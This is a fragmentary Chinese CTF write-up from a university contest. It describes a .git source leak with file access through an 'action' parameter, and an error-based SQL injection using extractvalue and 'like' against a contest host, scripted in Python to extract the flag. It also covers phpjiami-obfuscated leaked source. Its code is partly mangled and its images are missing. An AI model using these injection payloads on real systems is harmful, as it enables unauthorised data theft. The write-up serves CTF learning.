第三届上海大学生网络安全赛（线上赛）-MS1战队-Writeup

先k了这道题，web100那个还在想怎么绕，这个题说实话有点儿水了，

一开始扫到.git，



不过lijiejie的脚本并不能用，之前在p神的博客上看到过一个套路，是先commit完

了，然后把源文件删掉再重新导入源文件，这个题应该是用的这个思路，不过一看



可能有伪协议，试了一下，





，page不行，action的可以



，不过这里也说一下正确的解法，还是利用git的源码泄露，先把文件下载下来，然

后附上payload

就可以看到一部分代码，有这部分代码就足够了，就知道要利用action参数进行文

件访问，然后就得到flag

这个题有毒，做了差不多３个多小时，不过说到底还是自己菜，不找理由，进去显

然是sql注入，然后就是想怎么注，测试发现and还有特殊字符很多都被过滤了，最

扯的是'='都被过滤了，后来脑洞了一波，直接报错注入，用like代替=，然后在查询

printf"\xlf\x8b\x08\x00\x00\0x00\x00\x00"|cat‐文件|gunzip|

hexdump‐C|head

#url=

"http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.c

om/index.php?id=extractvalue(1,%20concat(0x3a,(select%20schema_namefrom

information_schema.schematalimit{},1)))".format(i)

#url=

"http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.c

om/index.php?id=extractvalue(1,%20concat(0x3a,

20table_namelike0x66313467limit%20{},1)))".format(i)

url=

"http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.c

om/index.php?id=extractvalue(1,%20concat(0x3a,(select

substring((select%20f14gfromf14g),{},1))))".format(i)

flag=flag+requests.get(url).content.split(':')[2].replace('\'','')

printflag

｀｀｀

这里再附上查询结果的图，

查数据库

这出题方也是够讨厌的，加上substring然后继续爆破，得到最后的flag

这道题目的思路非常６，首先是code.zip源码泄露，打开以后一看乱七八糟，应该

是phpjiami,之前在p神的博客上看过类似的文章，这里分享一下，

phpjiami

这里面提到了一个脚本，这里就不附代码了，直接把下载的code解密了，然后得到

部分源码，

admin.php

｀｀｀

<?php

;

}else{

header("Location:index.php");

}

}

?><?php

｀｀｀

file.php

web300